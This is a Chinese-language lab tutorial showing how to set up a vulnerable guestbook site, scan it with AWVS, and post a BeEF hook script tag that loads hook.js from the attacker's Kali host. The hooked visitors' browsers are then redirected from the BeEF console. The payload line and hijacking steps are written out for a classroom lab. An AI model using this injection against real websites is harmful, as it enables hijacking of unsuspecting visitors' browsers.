XSS攻击:利用Beef劫持被攻击者客户端浏览器

这篇具有很好参考价值的文章主要介绍了XSS攻击:利用Beef劫持被攻击者客户端浏览器。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法

系统环境:Kali Linux 2、Windows Server

网络环境:交换网络结构

实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner)

实验步骤:

实验环境搭建。

角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)

攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);

被攻击者:访问留言簿网站,浏览器被劫持。

首先攻击者和被攻击者需要连接同一个网络。

1.攻击者打开kali,打开Windows Server2003,二者都需要设置为桥接模式。

注意要同时设置虚拟网络适配器为桥接模式

XSS攻击:利用Beef劫持被攻击者客户端浏览器

 文章来源地址https://www.toymoban.com/news/detail-436014.html

2.Windows Server2003中需要把guestbook拉入D盘中,如果拉不进去,可用u盘协助,或下载VMare tools(可以去找找这个怎么下载)。

XSS攻击:利用Beef劫持被攻击者客户端浏览器

XSS攻击:利用Beef劫持被攻击者客户端浏览器 

 3.利用Windows Server2003创建一个网站

XSS攻击:利用Beef劫持被攻击者客户端浏览器

找到默认网站,右键选择属性 

XSS攻击:利用Beef劫持被攻击者客户端浏览器 

 将GuestBook选入XSS攻击:利用Beef劫持被攻击者客户端浏览器

 查看ip

XSS攻击:利用Beef劫持被攻击者客户端浏览器

 配置ip

XSS攻击:利用Beef劫持被攻击者客户端浏览器

 添加message.asp

 XSS攻击:利用Beef劫持被攻击者客户端浏览器

 打开浏览器,输入服务器ip可看到留言簿网站

 

4.利用AWVS扫描留言簿网站,发现其存在XSS漏洞

XSS攻击:利用Beef劫持被攻击者客户端浏览器

 一直next直到finish

XSS攻击:利用Beef劫持被攻击者客户端浏览器

 发现xss漏洞

 

 5.kali输入beef-xss指令得到恶意代码(如果没安装beef需要先安装,输入beef-xss然后根据提示一直‘y’就好了)

XSS攻击:利用Beef劫持被攻击者客户端浏览器

 恶意代码为图中红框部分,用的时候是<script src="http://Kali的IP地址:3000/hook.js"></script>,所以需要查看kali的ip

 输入beef-xss后会弹出一个页面,我们输入账号密码登录进去

XSS攻击:利用Beef劫持被攻击者客户端浏览器

 

6.访问http://留言簿网站/message.asp,将恶意代码写入网站留言板

XSS攻击:利用Beef劫持被攻击者客户端浏览器

 如果留言被管理员审核通过,你的留言能在留言板显示出来。当客户端访问服务器的留言板后,你可以在Beef控制端查看目标主机,如果出现下图所示内网,表示客户端浏览器已经被成功劫持。

XSS攻击:利用Beef劫持被攻击者客户端浏览器

 

XSS攻击:利用Beef劫持被攻击者客户端浏览器

 

 7.在Current Browser项选择Browser,点击Hooked Domain选择Redirect Browser,在右边的Redirect URL中输入网址,即可控制浏览器跳转到目标网址

XSS攻击:利用Beef劫持被攻击者客户端浏览器

 例如,输入https://www.csdn.net/即可控制受害者的页面跳转到CSDN官网页面

XSS攻击:利用Beef劫持被攻击者客户端浏览器

 

 

 

到了这里,关于XSS攻击:利用Beef劫持被攻击者客户端浏览器的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 攻击者使用 Python 编译的字节码来逃避检测

    以 PyPI(Python 包索引)等开源包存储库为目标的攻击者设计了一种新技术,可以将他们的恶意代码隐藏在安全扫描器、人工审查和其他形式的安全分析中。 在一次事件中,研究人员发现恶意软件代码隐藏在 Python 字节码 (PYC) 文件中,该文件可以直接执行,而不是源代码文件由

    2024年02月07日
    浏览(49)
  • 生成式人工智能:网络攻击者手中的破坏性力量

    2022 年底,公开可用的生成式人工智能工具的推出使我们进入了人类历史上最大的技术革命之一。 一些人声称它的影响与互联网、手机、智能手机和社交媒体的引入一样大,甚至更大。这些新的生成式人工智能技术的采用和发展速度是我们以前从未见过的。 虽然这场人工智能

    2024年02月06日
    浏览(46)
  • 通过蜜罐技术获取攻击者手机号、微信号【网络安全】

    相关声明: 以下内容仅限用于红蓝攻防对抗等专业领域,请勿用于非法用途。 首先,我们先讲一下蜜罐的概念,你可以简单理解较为蜜罐就是一个陷阱,故意暴露一些我们人为设计好的漏洞,让攻击者自投罗网。 蜜罐是对攻击者的欺骗技术,用以监视、检测、分析和溯源攻

    2024年02月12日
    浏览(38)
  • 危险的套娃:攻击者在 PDF 文件中隐藏恶意Word 文档

    据BleepingComputer消息,日本计算机紧急响应小组 (JPCERT) 日前分享了在2023 年 7 月检测到的利用PDF文档的新型攻击——PDF MalDoc攻击,能将恶意 Word 文件嵌入 PDF 来绕过安全检测。 JPCERT采样了一种多格式文件,能被大多数扫描引擎和工具识别为 PDF,但办公应用程序可以将其作为常

    2024年02月11日
    浏览(48)
  • D-LINK SQL注入漏洞让攻击者获得管理员权限

    D-Link DAR-7000 设备中发现了一个名为 SQL 注入的安全漏洞。 SQL注入是一种恶意攻击,它利用Web应用程序中的漏洞注入恶意SQL语句并获得对数据库的未经授权的访问。 此技术允许攻击者查看、修改和删除数据库中的数据,这可能对数据的机密性、完整性和可用性构成重大威胁。

    2024年02月07日
    浏览(50)
  • XSS的利用(包含:蓝莲花、beef-xss)

    dvwa靶场 操作指南和最佳实践:使用 DVWA 了解如何防止网站漏洞_dvwa源代码-CSDN博客 xss漏洞接收平台 下载:GitHub - firesunCN/BlueLotus_XSSReceiver 将解压后的BlueLotus_XSSReceiver原代码放置 phpstudy 安装目录的WWW文件夹下 访问平台:http://127.0.0.1/BlueLotus_XSSReceiver/  改一下密码,如:admin

    2024年01月16日
    浏览(40)
  • 【burpsuite安全练兵场-客户端14】点击劫持-5个实验(全)

       博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章)。 殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书,华为云、

    2024年02月02日
    浏览(32)
  • 通过 KernelUtil.dll 劫持 QQ / TIM 客户端 QQClientkey / QQKey 详细教程(附源码)

    前言 由于 QQ 9.7.20 版本后已经不能通过模拟网页快捷登录来截取 QQClientkey / QQKey,估计是针对访问的程序做了限制,然而经过多方面测试,诸多的地区、环境、机器也针对这种获取方法做了相应的措施,导致模拟网页快捷登录来截取数据被彻底的和谐,为了解决这个问题我们

    2024年02月02日
    浏览(45)
  • 【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验(上)

       博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章)。 殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等。 擅长:

    2024年02月02日
    浏览(43)
  • 【burpsuite安全练兵场-客户端11】跨站点脚本XSS-10个实验(下)

       博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章)。 殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书,华为云、

    2024年02月02日
    浏览(41)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包